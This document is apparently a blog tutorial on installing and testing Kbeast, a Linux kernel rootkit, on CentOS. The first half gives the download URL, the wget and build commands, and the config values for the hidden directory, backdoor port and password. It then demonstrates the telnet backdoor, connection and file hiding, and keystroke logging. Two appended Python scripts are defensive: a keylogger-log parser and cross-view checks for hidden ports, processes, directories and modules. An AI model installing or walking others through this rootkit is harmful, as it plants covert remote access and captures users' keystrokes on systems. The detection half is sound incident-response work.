Installing and Using the Kernel-Level Rootkit Kbeast

Download:

http://core.ipsecs.com/rootkit/kernel-rootkit/kbeast-v1/

Features (as listed in the README):

> Hiding this loadable kernel module
> Hiding files/directory
> Hiding process (ps, pstree, top, lsof)
> Hiding socket and connections (netstat, lsof)
> Keystroke logging to capture user activity
> Anti-kill process
> Anti-remove files
> Anti-delete this loadable kernel module
> Local root escalation backdoor
> Remote binding backdoor hidden by the kernel rootkit

The setup script supports kernels 2.6.16, 2.6.18, 2.6.32 and 2.6.35.
Installation steps (from the README):

> wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
> tar zxvf ipsecs-kbeast-v1.tar.gz
> cd kbeast-v1/
> modify config.h to meet your requirement, remember that _MAGIC_NAME_
must be a user with an sh/bash shell
> In order to install in kernel 2.6.16 or 2.6.18, execute ./setup build 0
> In order to install in kernel 2.6.32 or 2.6.35, execute ./setup build
(actually it should work for recent kernels too)
> In order to install in kernel 2.6.9, edit .cc1 file to remove all sys_unlinkat()
related code, modify syscall table address manually, then execute ./setup build 0

Note that the module is gone after a reboot, so it has to be loaded again from the boot-time startup scripts if it is to persist.

Tested on CentOS 5.5
Test machine kernel:
Build prerequisites (the kernel headers must match the running kernel, so if yum pulls in a newer kernel package, reboot into it before building):
yum install kernel kernel-devel gcc
1) Installation


Points to note:
In the configuration file config.h, #define _MAGIC_NAME_ "vincent" must name an existing account whose login shell is /bin/bash.

#define _H4X_PATH_ "/usr/_h4x_"  hidden directory the rootkit is installed into
#define _LOGFILE_ "acctlog"  keystroke log file name (written under _H4X_PATH_ with the UID appended, e.g. acctlog.0 for root)
#define _HIDE_PORT_ 13377  backdoor port (hidden from netstat)
#define _RPASSWORD_ "h4x3d"  backdoor password

2) Connecting to the backdoor
An nmap scan of the host shows port 13377 open:

[root@vincent ~]# nmap -p- 172.16.100.153

Starting Nmap 5.51 ( http://nmap.org ) at 2016-05-31 18:48 CST
Nmap scan report for 172.16.100.153
Host is up (0.000041s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
791/tcp open unknown
13377/tcp open unknown

Connect to the backdoor directly with telnet on that port.


3) Connection hiding
Checking with netstat, nothing on port 13377 shows up, neither the listening socket nor the established connection:

[root@localhost usr]# netstat -ano | grep 13377
[root@localhost usr]#

4) File hiding
/usr/_h4x_ is hidden: it does not appear in the ll listing, but you can still cd into it by name.

[root@localhost usr]# ll /usr/
total 216
drwxr-xr-x 2 root root 49152 03-23 01:24 bin
drwxr-xr-x 2 root root 4096 2010-01-27 etc
drwxr-xr-x 2 root root 4096 2010-01-27 games
drwxr-xr-x 37 root root 4096 03-23 00:40 include
drwxr-xr-x 6 root root 4096 03-22 23:13 kerberos
drwxr-xr-x 67 root root 20480 03-23 01:24 lib
drwxr-xr-x 94 root root 40960 03-23 01:24 lib64
drwxr-xr-x 10 root root 4096 03-23 01:24 libexec
drwxr-xr-x 12 root root 4096 03-22 23:12 local
drwxr-xr-x 2 root root 16384 03-23 01:24 sbin
drwxr-xr-x 197 root root 4096 03-22 23:31 share
drwxr-xr-x 4 root root 4096 03-22 23:12 src
lrwxrwxrwx 1 root root 10 03-22 23:12 tmp -> ../var/tmp
drwxr-xr-x 3 root root 4096 03-22 23:12 X11R6
[root@localhost usr]# cd /usr/_h4x_
[root@localhost _h4x_]# ls
acctlog.0 config.h ipsecs-kbeast-v1.cc1 ipsecs-kbeast-v1.mod.o Makefile README.TXT
acctlog.500 init ipsecs-kbeast-v1.ko ipsecs-kbeast-v1.o Module.markers setup
bd-ipsecs-kbeast-v1.c ipsecs-kbeast-v1.c ipsecs-kbeast-v1.mod.c LICENSE Module.symvers

5) Keystroke logging
Each line records the timestamp, the UID, the shell and the keys typed ([UP] is the up-arrow key recalling the previous command):

[root@localhost _h4x_]# cat acctlog.0
[30/03/2016-14:20:06] - [UID = 0 ] bash > ps aux
[30/03/2016-14:20:33] - [UID = 0 ] bash > [UP] | grep h4x
[30/03/2016-14:21:02] - [UID = 0 ] bash > ps xua | grep 3617
[30/03/2016-14:21:11] - [UID = 0 ] bash > ps -ef
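For incident response the log above is more useful once it is turned into a timeline of actual commands. The following parser is an added example for the acctlog format shown here; it is not part of the original post or of Kbeast. The four sample lines are the ones on the page. It assumes that a leading [UP] token is the up-arrow key recalling an earlier command of the same user and shell (n presses recall the n-th most recent command), which is how the second line becomes "ps aux | grep h4x".

```python
"""Parse Kbeast's acctlog keystroke log and rebuild the commands typed.

Added example for the log format shown above; not part of the original post
or of Kbeast. Line format:
  [DD/MM/YYYY-HH:MM:SS] - [UID = n ] <shell> > <keys typed>
Assumption: [UP] is the up-arrow key recalling the previous command, so the
rebuilt command line is a best effort, not something the logger guarantees.
"""
import re
from datetime import datetime

LINE_RE = re.compile(
    r"^\[(\d{2}/\d{2}/\d{4}-\d{2}:\d{2}:\d{2})\] - \[UID = (\d+) \] (\S+) > (.*)$"
)

# The four lines shown on the page.
SAMPLE_LOG = """\
[30/03/2016-14:20:06] - [UID = 0 ] bash > ps aux
[30/03/2016-14:20:33] - [UID = 0 ] bash > [UP] | grep h4x
[30/03/2016-14:21:02] - [UID = 0 ] bash > ps xua | grep 3617
[30/03/2016-14:21:11] - [UID = 0 ] bash > ps -ef
"""


def parse_acctlog(text):
    """One dict per well-formed line; truncated or garbled lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        records.append({
            "time": datetime.strptime(m.group(1), "%d/%m/%Y-%H:%M:%S"),
            "uid": int(m.group(2)),
            "shell": m.group(3),
            "keys": m.group(4),
        })
    return records


def reconstruct_commands(records):
    """Resolve leading [UP] tokens against the same uid+shell's earlier commands
    (assumption: n presses recall the n-th most recent one), then append the
    rest of the keys typed after the recall."""
    history, out = {}, []
    for r in records:
        hist = history.setdefault((r["uid"], r["shell"]), [])
        keys, steps = r["keys"], 0
        while keys.startswith("[UP]"):
            steps, keys = steps + 1, keys[len("[UP]"):]
        cmd = hist[-min(steps, len(hist))] + keys if steps and hist else keys
        hist.append(cmd)
        out.append({**r, "command": cmd})
    return out


def rebuilt_commands(text):
    """Convenience: the rebuilt command lines of a log, in order."""
    return [r["command"] for r in reconstruct_commands(parse_acctlog(text))]


if __name__ == "__main__":
    for r in reconstruct_commands(parse_acctlog(SAMPLE_LOG)):
        print(r["time"].isoformat(), "uid=%d" % r["uid"], r["shell"], r["command"])
```

Feeding it a real acctlog.<uid> file instead of SAMPLE_LOG gives a per-user command timeline; keep the raw "keys" field alongside "command" in any report, since the [UP] resolution is an inference.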

6) Process hiding
Skimming the raw ps output by eye you will not spot the process, but a grep finds it, so ps is still being handed the entry; in this test the process was not actually hidden.

[root@localhost _h4x_]# ps xua | grep h4x
vincent 3617 0.0 0.1 66108 1584 ? Ss 15:20 0:00 ./_h4x_bd

Redirecting ps aux to a file and grepping the file shows it as well.

[root@localhost _h4x_]# ps xua > /tmp/ps.txt
[root@localhost _h4x_]# cat /tmp/ps.txt | grep h4x
vincent 3617 0.0 0.1 66108 1584 ? Ss 15:20 0:00 ./_h4x_bd
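Sections 2, 3, 4 and 6 above each expose the same weakness of this kind of rootkit: it filters one view (netstat, ls, ps, lsmod) but not another (a port scan from the network, a stat() of a path by name, /proc/<pid> opened by number, sysfs). The script below is an added example, written for this page and not part of the original post or of Kbeast, that turns those four discrepancies into checks. The nmap text is the page's own output; the netstat, ps and /proc/modules samples are constructed to show what the infected host would report, and the module name ipsecs_kbeast_v1 and the assumption that a list_del()-style module hider leaves its /sys/module entry behind are mine.

```python
"""Cross-view checks for a Kbeast-style LKM rootkit.

Added example, not part of the original post and not Kbeast's own code.
Each check pairs a view the rootkit filters (netstat/ps/ls/lsmod, which all go
through directory or /proc listings) with one it does not: a TCP scan from the
network, open()/stat() of a path by name, or sysfs.
Samples: the page's nmap output plus constructed netstat, ps and /proc/modules
text, so the module runs offline; running it as a script also checks the live host.
"""
import os
import re
import subprocess

# --- 1. hidden listening port: network view (nmap) vs local view (netstat) ---
NMAP_OUTPUT = """\
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
791/tcp open unknown
13377/tcp open unknown
"""
# Constructed: `netstat -ano` on the infected host, port 13377 filtered out.
NETSTAT_OUTPUT = """\
Proto Recv-Q Send-Q Local Address        Foreign Address      State   Timer
tcp        0      0 0.0.0.0:791          0.0.0.0:*            LISTEN  off (0.00/0/0)
tcp        0      0 0.0.0.0:111          0.0.0.0:*            LISTEN  off (0.00/0/0)
tcp        0      0 :::22                :::*                 LISTEN  off (0.00/0/0)
"""


def ports_from_nmap(text):
    """Open TCP ports listed in `nmap -p-` output."""
    return sorted({int(p) for p in re.findall(r"^(\d+)/tcp\s+open\b", text, re.M)})


def ports_from_netstat(text):
    """Listening TCP ports from netstat output (local address column is host:port)."""
    pat = r"^tcp6?\s+\d+\s+\d+\s+\S+:(\d+)\s+\S+\s+LISTEN"
    return sorted({int(p) for p in re.findall(pat, text, re.M)})


def hidden_ports(network_view, local_view):
    """Ports that answer on the wire but are missing from the kernel-filtered list."""
    return sorted(set(network_view) - set(local_view))


# --- 2. hidden process: brute-forced /proc/<pid> vs ps output ---
# Constructed: `ps aux` on the infected host with pid 3617 (./_h4x_bd) filtered out.
PS_OUTPUT = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 10368 684 ? Ss 15:19 0:00 init [3]
root 2 0.0 0.0 0 0 ? S< 15:19 0:00 [migration/0]
root 3600 0.0 0.1 66100 1580 pts/0 Ss 15:20 0:00 -bash
"""


def pids_from_ps(text):
    """PIDs (second column) from `ps aux`-style text; the header row is skipped."""
    rows = (line.split() for line in text.splitlines())
    return {int(f[1]) for f in rows if len(f) > 1 and f[1].isdigit()}


def pids_by_bruteforce(proc="/proc"):
    """Every pid whose /proc/<pid>/status opens by name. A getdents() hook hides
    directory entries but cannot stop open() of a path the caller already knows.
    Walks up to pid_max entries, so it takes a few seconds on modern kernels."""
    try:
        with open(os.path.join(proc, "sys/kernel/pid_max")) as f:
            pid_max = int(f.read())
    except (OSError, ValueError):
        pid_max = 32768  # 2.6-era default
    return {pid for pid in range(1, pid_max + 1)
            if os.path.exists(os.path.join(proc, str(pid), "status"))}


def hidden_pids(bruteforce_view, ps_view):
    return sorted(set(bruteforce_view) - set(ps_view))


# --- 3. hidden directory: stat() by name vs the parent's listing ---
def hidden_entries(parent, names):
    """Candidate names that exist when stat()-ed by full path but are absent from
    the listing of their parent (the ll-vs-cd discrepancy on the page)."""
    listed = set(os.listdir(parent))
    return [n for n in names if n not in listed and os.path.lexists(os.path.join(parent, n))]


# --- 4. hidden module: sysfs vs /proc/modules (what lsmod reads) ---
# Constructed: /proc/modules on the infected host, rootkit unlinked from the list.
PROC_MODULES = """\
ext3 123456 1 - Live 0xffffffff88000000
jbd 56789 1 ext3, Live 0xffffffff88020000
"""


def modules_from_proc(text):
    return {line.split()[0] for line in text.splitlines() if line.strip()}


def modules_from_sysfs(sysdir="/sys/module"):
    """Loaded modules per sysfs: entries with an initstate file (built-in modules
    have none). Assumption: a list_del()-style hider leaves this entry behind."""
    return {m for m in os.listdir(sysdir)
            if os.path.exists(os.path.join(sysdir, m, "initstate"))}


def hidden_modules(sysfs_view, proc_view):
    return sorted(set(sysfs_view) - set(proc_view))


def offline_demo():
    """The checks run on the embedded samples (module name is an assumption)."""
    return {
        "ports": hidden_ports(ports_from_nmap(NMAP_OUTPUT), ports_from_netstat(NETSTAT_OUTPUT)),
        "pids": hidden_pids({1, 2, 3600, 3617}, pids_from_ps(PS_OUTPUT)),
        "modules": hidden_modules({"ext3", "jbd", "ipsecs_kbeast_v1"},
                                  modules_from_proc(PROC_MODULES)),
    }


if __name__ == "__main__":
    print("offline samples:", offline_demo())
    if os.path.isdir("/proc") and os.path.isdir("/sys/module"):  # live checks, Linux only
        ps = subprocess.run(["ps", "aux"], capture_output=True, text=True).stdout
        print("pids missing from ps:", hidden_pids(pids_by_bruteforce(), pids_from_ps(ps)))
        with open("/proc/modules") as f:
            print("modules missing from lsmod:",
                  hidden_modules(modules_from_sysfs(), modules_from_proc(f.read())))
        print("entries hidden in /usr:", hidden_entries("/usr", ["_h4x_"]))
```

Run the live part from a trusted environment where possible (a rescue boot or a statically linked ps copied in), because the rootkit also hooks the tools used to gather the "filtered" view; the cross-view logic only needs one of the two views to be honest. The pid brute force is deliberately slow and noisy, which is acceptable for a one-off check but not for a scheduled job.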